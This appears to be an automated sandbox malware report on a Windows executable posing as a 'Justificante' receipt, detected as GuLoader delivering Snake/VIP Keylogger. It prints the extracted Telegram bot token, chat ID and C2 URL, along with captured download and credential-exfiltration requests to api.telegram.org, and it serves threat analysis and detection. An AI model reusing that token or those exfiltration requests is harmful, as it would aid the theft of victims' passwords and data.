Windows Analysis Report
Justificante67ab404ffe31b359e00a499e656454545.exe

Overview

General Information

Sample name: Justificante67ab404ffe31b359e00a499e656454545.exe
Analysis ID: 1615359
MD5: b1311507ccad8738e432250721633828
SHA1: 0a8c23e3f5f4e0c9517c5c44dd42ff4f5741f8c5
SHA256: 738b4545d501e7f240c2f1e3cf98218f703b4ee08d529c87aca5b8270aac4643
Tags: exe, user-abuse_ch

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2049807822.00000000028B7000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T20:00:42.201672+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | TCP
2025-02-14T20:00:40.460712+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 158.101.44.242 | 80 | TCP
2025-02-14T20:00:41.570275+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 158.101.44.242 | 80 | TCP
2025-02-14T20:00:42.835736+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | TCP
2025-02-14T20:00:34.584888+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 216.58.206.78 | 443 | TCP
2025-02-14T20:00:59.066295+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49819 | 149.154.167.220 | 443 | TCP
2025-02-14T20:00:51.851507+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49773 | 149.154.167.220 | 443 | TCP

            AV Detection

Source: 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}
Source: Justificante67ab404ffe31b359e00a499e656454545.exe.6392.4.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}
Source: Justificante67ab404ffe31b359e00a499e656454545.exe | Virustotal: Detection: 29%
Source: Justificante67ab404ffe31b359e00a499e656454545.exe | ReversingLabs: Detection: 62%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 4_2_360987A8 CryptUnprotectData
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 4_2_36098EF1 CryptUnprotectData
Source: Justificante67ab404ffe31b359e00a499e656454545.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: Justificante67ab404ffe31b359e00a499e656454545.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 0_2_0040646B FindFirstFileA, FindClose
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 0_2_004027A1 FindFirstFileA
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 0_2_004058BF GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 4_2_0040646B FindFirstFileA, FindClose
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 4_2_004027A1 FindFirstFileA
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | Code function: 4_2_004058BF GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe | File opened: C:\Users\user\AppData\Local\Microsoft

            Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49773 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49819 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2015/02/2025%20/%2000:56:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd4dbcb03dbc38 | Host: api.telegram.org | Content-Length: 581
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.32.1
            Source: Joe Sandbox View IP Address: 158.101.44.242
            Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown DNS query: name: checkip.dyndns.org
            Source: unknown DNS query: name: reallyfreegeoip.org
            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 158.101.44.242:80
            Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 158.101.44.242:80
            Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 216.58.206.78:443
            Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.32.1:443
            Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /download?id=1es5vHQSxsZ5VTyJjIIWEcmn6UO_kGzRz&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.0
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic DNS traffic detected: DNS query: drive.google.com
            Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic DNS traffic detected: DNS query: api.telegram.org
            Source: unknown HTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd4dbcb03dbc38 Host: api.telegram.org Content-Length: 581
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 14 Feb 2025 19:00:51 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: unknown HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File created: C:\Windows\Behovsundersgelses
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_02553B894_2_02553B89
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255E97A4_2_0255E97A
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0255F9614_2_0255F961
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_025529EC4_2_025529EC
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EACDC04_2_35EACDC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA51484_2_35EA5148
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA18504_2_35EA1850
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA1FA84_2_35EA1FA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADF204_2_35EADF20
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA2A904_2_35EA2A90
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA96684_2_35EA9668
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EACDBF4_2_35EACDBF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA89B14_2_35EA89B1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA9D8F4_2_35EA9D8F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA9D904_2_35EA9D90
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA51424_2_35EA5142
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF92F4_2_35EAF92F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF9304_2_35EAF930
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA8CC04_2_35EA8CC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF4D84_2_35EAF4D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA8CB14_2_35EA8CB1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF0804_2_35EAF080
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAF07F4_2_35EAF07F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA00404_2_35EA0040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA18414_2_35EA1841
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAEC284_2_35EAEC28
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA00214_2_35EA0021
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE7CF4_2_35EAE7CF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE7D04_2_35EAE7D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA1F9C4_2_35EA1F9C
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE3784_2_35EAE378
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAE3774_2_35EAE377
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA0B204_2_35EA0B20
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA0B304_2_35EA0B30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADF1B4_2_35EADF1B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADAC84_2_35EADAC8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EADAC74_2_35EADAC7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA2A804_2_35EA2A80
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAD6674_2_35EAD667
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAD6704_2_35EAD670
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EA965F4_2_35EA965F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_35EAD2184_2_35EAD218
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36097B784_2_36097B78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36098FB04_2_36098FB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609FC184_2_3609FC18
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360981D04_2_360981D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096A184_2_36096A18
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096A134_2_36096A13
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360946174_2_36094617
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360946204_2_36094620
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091A474_2_36091A47
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091A504_2_36091A50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609EE574_2_3609EE57
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094A684_2_36094A68
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609EE684_2_3609EE68
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609CE674_2_3609CE67
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609CE784_2_3609CE78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094A784_2_36094A78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096E704_2_36096E70
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36096E724_2_36096E72
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091E9F4_2_36091E9F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36091EA84_2_36091EA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360972BF4_2_360972BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360972C84_2_360972C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094EC04_2_36094EC0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36094ED04_2_36094ED0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F2E74_2_3609F2E7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F2F84_2_3609F2F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360922F74_2_360922F7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D2F74_2_3609D2F7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D3084_2_3609D308
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360923004_2_36092300
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B3074_2_3609B307
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B3184_2_3609B318
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609531F4_2_3609531F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360953284_2_36095328
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360977204_2_36097720
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360977224_2_36097722
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609274F4_2_3609274F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360927584_2_36092758
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F7784_2_3609F778
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36097B774_2_36097B77
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609F7884_2_3609F788
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360957804_2_36095780
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D7874_2_3609D787
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609D7984_2_3609D798
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B7984_2_3609B798
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609B7A84_2_3609B7A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36092BAF4_2_36092BAF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36098FA14_2_36098FA1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36092BB04_2_36092BB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36095BD84_2_36095BD8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36092FF94_2_36092FF9
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360930084_2_36093008
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609DC194_2_3609DC19
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609DC284_2_3609DC28
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609BC2B4_2_3609BC2B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609602F4_2_3609602F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609BC384_2_3609BC38
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360960304_2_36096030
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360900374_2_36090037
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360900404_2_36090040
